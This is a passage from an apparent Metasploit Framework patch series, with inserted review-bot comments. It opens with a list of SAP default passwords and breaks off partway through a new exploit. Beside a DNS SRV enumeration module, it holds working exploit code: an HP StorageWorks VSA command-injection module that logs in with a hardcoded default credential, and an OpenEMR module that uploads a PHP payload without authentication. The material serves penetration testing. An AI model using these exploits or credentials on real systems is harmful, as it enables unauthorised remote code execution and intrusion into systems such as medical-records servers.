DEVELOPER ch4ngeme J2EE_ADMIN ch4ngeme SAPJSF ch4ngeme +SAPR3 SAP +CTB_ADMIN sap123 +XMI_DEMO sap123 \ No newline at end of file From 374faf9b0282c03312711af28b3a760d0154bf25 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 16:19:48 +0100 Subject: [PATCH 400/421] cleanup for dns_srv --- modules/auxiliary/gather/dns_srv.rb | 110 ++++++++++++++-------------- 1 file changed, 55 insertions(+), 55 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index a80e864b20f5..aeb3eef1c5c1 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb 
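Review bot: The PTR names passed to `report_host(:name => addresstp)` in `reverselkp` are recorded at face value, but a PTR record is set by whoever controls the reverse zone for that address and need not match any forward record. A short comment above the call would make that explicit for anyone consuming the stored names, for example `# PTR data comes from the reverse-zone owner and is not forward-confirmed`. `reverselkp` begins and ends outside this hunk.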
@@ -16,7 +16,12 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Common Service Record Enumeration', 'Description' => %q{ - This module enumerates common DNS service records. + This module enumerates common DNS service records in a given domain. By setting + the ALL_DNS to true, all the name servers of a given domain are used for + enumeration. Otherwise only the system dns is used for enumration. in order to get + all the available name servers for the given domain the SOA and NS records are + queried. In order to convert from domain names to IP addresses queries for A and + AAAA (IPv6) records are used. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE @@ -25,13 +30,13 @@ def initialize(info = {}) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name."]), - OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]), + OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]) ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 3]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 4]), + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]) ], self.class) end @@ -61,6 +66,10 @@ def run records.uniq! records.each do |r| print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") + report_host( + :host => r[:address].to_s, + :name => r[:host] + ) report_service( :host=> r[:address].to_s, :port => r[:port].to_i, 
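Review bot: The new description tells the user to set `ALL_DNS` to true, but the option registered in the following hunk is `ALL_NS`, so the documented name does not exist. The same paragraph has `enumration` and a sentence that starts with a lowercase `in order`. Suggested wording for the two affected lines: `the ALL_NS option to true, all the name servers of a given domain are used for` and `enumeration. Otherwise only the system DNS is used for enumeration. In order to get`. The text is carried over unchanged into dns_srv_enum.rb by the rename commits that follow.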
@@ -68,39 +77,34 @@ def run :name => r[:service], :host_name => r[:host] ) - report_host( - :host => r[:address].to_s, - :name => r[:host] - ) end end - #--------------------------------------------------------------------------------- + def get_soa(target) results = [] query = @res.query(target, "SOA") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| - if Rex::Socket.dotted_ip?(rr.mname) + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| record = {} - record[:host] = rr.mname + record[:host] = rr.mname.gsub(/\.$/,'') record[:type] = "SOA" - record[:address] = rr.mname + record[:address] = ip[:address].to_s results << record - else - get_ip(rr.mname).each do |ip| - record = {} - record[:host] = rr.mname.gsub(/\.$/,'') - record[:type] = "SOA" - record[:address] = ip[:address].to_s - results << record - end end end end return results end - #------------------------------------------------------------------------------- + def srvqry(dom) results = [] #Most common SRV Records 
@@ -127,36 +131,35 @@ def srvqry(dom) begin query = @res.query(trg , Net::DNS::SRV) - if query - query.answer.each do |srv| - if Rex::Socket.dotted_ip?(srv.host) + next unless query + query.answer.each do |srv| + if Rex::Socket.dotted_ip?(srv.host) + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = srv.host + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") + else + get_ip(srv.host.gsub(/\.$/,'')).each do |ip| record = {} srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] record[:host] = srv.host.gsub(/\.$/,'') record[:type] = "SRV" - record[:address] = srv.host + record[:address] = ip[:address] record[:srv] = srvt record[:service] = srv_info[0] record[:proto] = srv_info[1] record[:port] = srv.port record[:priority] = srv.priority results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") - else - get_ip(srv.host.gsub(/\.$/,'')).each do |ip| - record = {} - srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] - record[:host] = srv.host.gsub(/\.$/,'') - record[:type] = "SRV" - record[:address] = ip[:address] - record[:srv] = srvt - record[:service] = srv_info[0] - record[:proto] = srv_info[1] - record[:port] = srv.port - record[:priority] = srv.priority - results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") - end + vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") end end end 
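Review bot: `srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0]` yields nil for the list entries that lack the `_name._tcp.` or `_name._udp.` shape, such as `'_sip._tls.'`, `'_imap.tcp.'` and `'_kerberos.tcp.dc._msdcs.'` (the list is visible in the full file later in this series). `srv_info[0]` then raises NoMethodError, and the bare `rescue` that closes this `begin` swallows it, so any answer for those names is dropped without a message. Either correct the entries (for example `'_imap._tcp.'`) or add `next unless srv_info` right after the scan, and narrow the `rescue` to the resolver errors it is meant to cover. `srvqry` starts and ends outside this hunk.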
@@ -166,7 +169,6 @@ def srvqry(dom) return results end - #--------------------------------------------------------------------------------- def get_ip(host) results = [] query = @res.search(host, "A") @@ -199,26 +201,24 @@ def get_ip(host) end return results end - #--------------------------------------------------------------------------------- + def switchdns(ns) vprint_status("Enumerating SRV Records on: #{ns}") @res.nameserver=(ns) @nsinuse = ns end - #--------------------------------------------------------------------------------- def get_ns(target) results = [] query = @res.query(target, "NS") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| - get_ip(rr.nsdname).each do |r| - record = {} - record[:host] = rr.nsdname.gsub(/\.$/,'') - record[:type] = "NS" - record[:address] = r[:address].to_s - results << record - end + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record end end return results From d1ba8604099e7ebf8c6951aa4ea745e1e8daa860 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 16:20:33 +0100 Subject: [PATCH 401/421] changing filename for dns_srv --- modules/auxiliary/gather/dns_srv.rb | 227 ---------------------------- 1 file changed, 227 deletions(-) delete mode 100644 modules/auxiliary/gather/dns_srv.rb diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb deleted file mode 100644 index aeb3eef1c5c1..000000000000 --- a/modules/auxiliary/gather/dns_srv.rb +++ /dev/null 
@@ -1,227 +0,0 @@ -## -# ## This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require "net/dns/resolver" -require 'rex' - -class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DNS Common Service Record Enumeration', - 'Description' => %q{ - This module enumerates common DNS service records in a given domain. By setting - the ALL_DNS to true, all the name servers of a given domain are used for - enumeration. Otherwise only the system dns is used for enumration. in order to get - all the available name servers for the given domain the SOA and NS records are - queried. In order to convert from domain names to IP addresses queries for A and - AAAA (IPv6) records are used. - }, - 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], - 'License' => BSD_LICENSE - )) - - register_options( - [ - OptString.new('DOMAIN', [ true, "The target domain name."]), - OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]) - ], self.class) - - register_advanced_options( - [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]) - ], self.class) - end - - def run - records = [] - @res = Net::DNS::Resolver.new() - if datastore['RETRY'] - @res.retry = datastore['RETRY'].to_i - end - - if datastore['RETRY_INTERVAL'] - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i - end - - print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") - records = records + srvqry(datastore['DOMAIN']) - if datastore["ALL_NS"] - get_soa(datastore['DOMAIN']).each do |s| - switchdns(s[:address]) - records = 
records + srvqry(datastore['DOMAIN']) - end - get_ns(datastore['DOMAIN']).each do |ns| - switchdns(ns[:address]) - records =records + srvqry(datastore['DOMAIN']) - end - end - records.uniq! - records.each do |r| - print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") - report_host( - :host => r[:address].to_s, - :name => r[:host] - ) - report_service( - :host=> r[:address].to_s, - :port => r[:port].to_i, - :proto => r[:proto], - :name => r[:service], - :host_name => r[:host] - ) - end - - end - - def get_soa(target) - results = [] - query = @res.query(target, "SOA") - return results if not query - (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| - if Rex::Socket.dotted_ip?(rr.mname) - record = {} - record[:host] = rr.mname - record[:type] = "SOA" - record[:address] = rr.mname - results << record - else - get_ip(rr.mname).each do |ip| - record = {} - record[:host] = rr.mname.gsub(/\.$/,'') - record[:type] = "SOA" - record[:address] = ip[:address].to_s - results << record - end - end - end - return results - end - - def srvqry(dom) - results = [] - #Most common SRV Records - srvrcd = [ - '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', - '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', - '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', - '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', - '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', - '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', - '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', - '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', - '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', - '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', - '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', - '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', - 
'_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', - '_ldap._tcp.ForestDNSZones.', '_ldap._tcp.dc._msdcs.', '_ldap._tcp.pdc._msdcs.', - '_ldap._tcp.gc._msdcs.','_kerberos._tcp.dc._msdcs.','_kpasswd._tcp.','_kpasswd._udp.' - ] - - srvrcd.each do |srvt| - trg = "#{srvt}#{dom}" - begin - - query = @res.query(trg , Net::DNS::SRV) - next unless query - query.answer.each do |srv| - if Rex::Socket.dotted_ip?(srv.host) - record = {} - srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] - record[:host] = srv.host.gsub(/\.$/,'') - record[:type] = "SRV" - record[:address] = srv.host - record[:srv] = srvt - record[:service] = srv_info[0] - record[:proto] = srv_info[1] - record[:port] = srv.port - record[:priority] = srv.priority - results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") - else - get_ip(srv.host.gsub(/\.$/,'')).each do |ip| - record = {} - srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] - record[:host] = srv.host.gsub(/\.$/,'') - record[:type] = "SRV" - record[:address] = ip[:address] - record[:srv] = srvt - record[:service] = srv_info[0] - record[:proto] = srv_info[1] - record[:port] = srv.port - record[:priority] = srv.priority - results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") - end - end - end - rescue - end - end - return results - end - - def get_ip(host) - results = [] - query = @res.search(host, "A") - if (query) - query.answer.each do |rr| - if rr.type == "CNAME" - results = results + get_ip(rr.cname) - else - record = {} - record[:host] = host - record[:type] = "AAAA" - record[:address] = rr.address.to_s - results << record - end - end - end - query1 = @res.search(host, "AAAA") - if (query1) - query1.answer.each do |rr| - if rr.type == "CNAME" - results = results + get_ip(rr.cname) - else - record = {} - record[:host] = host - record[:type] = "AAAA" - 
record[:address] = rr.address.to_s - results << record - end - end - end - return results - end - - def switchdns(ns) - vprint_status("Enumerating SRV Records on: #{ns}") - @res.nameserver=(ns) - @nsinuse = ns - end - - def get_ns(target) - results = [] - query = @res.query(target, "NS") - return results if not query - (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| - get_ip(rr.nsdname).each do |r| - record = {} - record[:host] = rr.nsdname.gsub(/\.$/,'') - record[:type] = "NS" - record[:address] = r[:address].to_s - results << record - end - end - return results - end -end - From 829cf0f076d1398518a73cf6de38923ee20ac6a6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 16:20:55 +0100 Subject: [PATCH 402/421] name changed to dns_srv_enum --- modules/auxiliary/gather/dns_srv_enum.rb | 227 +++++++++++++++++++++++ 1 file changed, 227 insertions(+) create mode 100644 modules/auxiliary/gather/dns_srv_enum.rb diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb new file mode 100644 index 000000000000..aeb3eef1c5c1 --- /dev/null +++ b/modules/auxiliary/gather/dns_srv_enum.rb 
@@ -0,0 +1,227 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Common Service Record Enumeration', + 'Description' => %q{ + This module enumerates common DNS service records in a given domain. By setting + the ALL_DNS to true, all the name servers of a given domain are used for + enumeration. Otherwise only the system dns is used for enumration. in order to get + all the available name servers for the given domain the SOA and NS records are + queried. In order to convert from domain names to IP addresses queries for A and + AAAA (IPv6) records are used. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name."]), + OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]) + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]) + ], self.class) + end + + def run + records = [] + @res = Net::DNS::Resolver.new() + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end + + print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") + records = records + srvqry(datastore['DOMAIN']) + if datastore["ALL_NS"] + get_soa(datastore['DOMAIN']).each do |s| + switchdns(s[:address]) + records = 
records + srvqry(datastore['DOMAIN']) + end + get_ns(datastore['DOMAIN']).each do |ns| + switchdns(ns[:address]) + records =records + srvqry(datastore['DOMAIN']) + end + end + records.uniq! + records.each do |r| + print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") + report_host( + :host => r[:address].to_s, + :name => r[:host] + ) + report_service( + :host=> r[:address].to_s, + :port => r[:port].to_i, + :proto => r[:proto], + :name => r[:service], + :host_name => r[:host] + ) + end + + end + + def get_soa(target) + results = [] + query = @res.query(target, "SOA") + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| + record = {} + record[:host] = rr.mname.gsub(/\.$/,'') + record[:type] = "SOA" + record[:address] = ip[:address].to_s + results << record + end + end + end + return results + end + + def srvqry(dom) + results = [] + #Most common SRV Records + srvrcd = [ + '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', + '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', + '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', + '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', + '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', + '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', + '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', + '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', + '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', + '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', + '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', + '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', + 
'_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', + '_ldap._tcp.ForestDNSZones.', '_ldap._tcp.dc._msdcs.', '_ldap._tcp.pdc._msdcs.', + '_ldap._tcp.gc._msdcs.','_kerberos._tcp.dc._msdcs.','_kpasswd._tcp.','_kpasswd._udp.' + ] + + srvrcd.each do |srvt| + trg = "#{srvt}#{dom}" + begin + + query = @res.query(trg , Net::DNS::SRV) + next unless query + query.answer.each do |srv| + if Rex::Socket.dotted_ip?(srv.host) + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = srv.host + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") + else + get_ip(srv.host.gsub(/\.$/,'')).each do |ip| + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = ip[:address] + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") + end + end + end + rescue + end + end + return results + end + + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + 
record[:address] = rr.address.to_s + results << record + end + end + end + return results + end + + def switchdns(ns) + vprint_status("Enumerating SRV Records on: #{ns}") + @res.nameserver=(ns) + @nsinuse = ns + end + + def get_ns(target) + results = [] + query = @res.query(target, "NS") + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record + end + end + return results + end +end + From 221ce22f53e9f80b6ecb4dcff28b817870413639 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 19:01:58 +0100 Subject: [PATCH 403/421] make msftidy happy --- modules/exploits/multi/misc/hp_vsa_exec.rb | 51 ++++++++++++++++++---- 1 file changed, 43 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index d9a7bbab08a1..b9aae48bdf6f 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -17,7 +17,7 @@ def initialize(info={}) 'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution", 'Description' => %q{ This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on - versions prior to 9.5. By using a default account credential, it is possible + versions prior to 9.5. By using a default account credential, it is possible to inject arbitrary commands as part of a ping request via port 13838. }, 'License' => MSF_LICENSE, @@ -50,9 +50,11 @@ def initialize(info={}) 'Arch' => ARCH_CMD, 'Targets' => [ - ['HP VSA prior to 9.5', {}] + [ 'Automatic', {} ], + [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ], + [ 'HP VSA 9', { 'Version' => '9.0.0' } ] ], - 'Privileged' => false, + 'Privileged' => true, 'DisclosureDate' => "Nov 11 2011", 'DefaultTarget' => 0)) 
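Review bot: In `get_ip` the branch that handles answers to the `"A"` query sets `record[:type] = "AAAA"`, so IPv4 addresses are stored as IPv6 records; that line should be `record[:type] = "A"`. In `srvqry` the names `'_imap.tcp.'`, `'_kerberos.tcp.dc._msdcs.'` and `'_sip._tls.'` do not match `/^_(\S*)\._(tcp|udp)\./`, so `srv_info` is nil and any answer for them raises NoMethodError, which the bare `rescue` then discards without a trace. Add `next unless srv_info` and rescue a named error class with a `vprint_error` so failures are visible. `get_ip` also follows every CNAME recursively with no depth limit, so a zone with a CNAME loop may recurse until the stack is exhausted.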
@@ -75,20 +77,53 @@ def generate_packet(data) pkt end + def get_target + if target.name !~ /Automatic/ + return target + end - def exploit - connect - - # Login packet - print_status("#{rhost}:#{rport} Sending login packet") + # Login at 8.5.0 packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"") + print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0") + sock.put(packet) + res = sock.get_once + vprint_status(Rex::Text.to_hex_dump(res)) if res + if res and res=~ /OK/ and res=~ /Login/ + return targets[1] + end + + # Login at 9.0.0 + packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"") + print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0") sock.put(packet) res = sock.get_once vprint_status(Rex::Text.to_hex_dump(res)) if res + if res and res=~ /OK/ and res =~ /Login/ + return targets[2] + end + + fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'") + end + + def exploit + connect + + if target.name =~ /Automatic/ + my_target = get_target + print_good("#{rhost}:#{rport} - Target #{my_target.name} found") + else + my_target = target + print_status("#{rhost}:#{rport} Sending login packet") + packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"") + sock.put(packet) + res = sock.get_once + vprint_status(Rex::Text.to_hex_dump(res)) if res + end # Command execution print_status("#{rhost}:#{rport} Sending injection") data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/" + data << "64/5/" if my_target.name =~ /9/ packet = generate_packet(data) sock.put(packet) res = sock.get_once From a19da61177097efeae07e2c5b72eec2cb2a772a2 Mon Sep 17 00:00:00 2001 
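Review bot: The login exchange is now written out three times (twice in `get_target`, once in the non-automatic branch of `exploit`), differing only in the version string; a small private helper that takes the version and returns the response would keep the copies from drifting apart. The `fail_with` message in `get_target` ends with a stray apostrophe (`didn't work'`). `my_target.name =~ /9/` decides protocol behaviour from a display name, where a comparison on `my_target['Version']` would be less brittle. `exploit` continues past the end of the hunk.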
From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 16 Feb 2013 00:53:28 +0100 Subject: [PATCH 404/421] deleting trailing comma --- modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 4d18e2dc74d6..18c7eb70198a 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -36,7 +36,7 @@ def initialize 'References' => [ [ 'CVE', '2013-1625' ], - ], + ] ) register_options([Opt::RPORT(31001)], self.class) From 6b1bb9e1e8f3c31dbdc1a8e21b0cdd6a80de8c1b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 16 Feb 2013 13:11:46 +0100 Subject: [PATCH 405/421] Added module for OSVDB 90222 --- .../unix/webapp/openemr_upload_exec.rb | 132 ++++++++++++++++++ 1 file changed, 132 insertions(+) create mode 100644 modules/exploits/unix/webapp/openemr_upload_exec.rb diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb new file mode 100644 index 000000000000..41957608bf8b --- /dev/null +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb 
@@ -0,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "OpenEMR PHP File Upload Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
+ ofc_upload_image.php file from the openflashchart library, a malicious user can
+ upload a file to the tmp-upload-images directory without any authentication, which
+ results in arbitrary code execution. The module has been tested successfully on
+ OpenEMR 4.1.1 over Ubuntu 10.04.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '90222' ],
+ [ 'BID', '37314' ],
+ [ 'EBD', '24492' ],
+ [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
+ [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['OpenEMR 4.1.1', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 13 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
+ ], self.class)
+ end
+
+ def check
+ uri = target_uri.path
+ peer = "#{rhost}:#{rport}"
+
+ # Check version
+ print_status("#{peer} - Trying to detect installed version")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "interface", "login", "login.php")
+ })
+
+ if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
+ version = $1
+ else + return Exploit::CheckCode::Unknown + end + + print_status("#{peer} - Version #{version} detected") + + if version > "4.1.1" + return Exploit::CheckCode::Safe + end + + # Check for vulnerable component + print_status("#{peer} - Trying to detect the vulnerable component") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"), + }) + + if res and res.code == 200 and res.body =~ /Saving your image to/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + uri = target_uri.path + + peer = "#{rhost}:#{rport}" + payload_name = rand_text_alpha(rand(10) + 5) + '.php' + my_payload = payload.encoded + + print_status("#{peer} - Sending PHP payload (#{payload_name})") + res = send_request_raw({ + 'method' => 'POST', + 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", + 'headers' => { "Content-Length" => my_payload.length.to_s }, + 'data' => my_payload + }) + + # If the server returns 200 and the body contains our payload name, + # we assume we uploaded the malicious file successfully + if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/ + fail_with(Exploit::Failure::NotVulnerable, 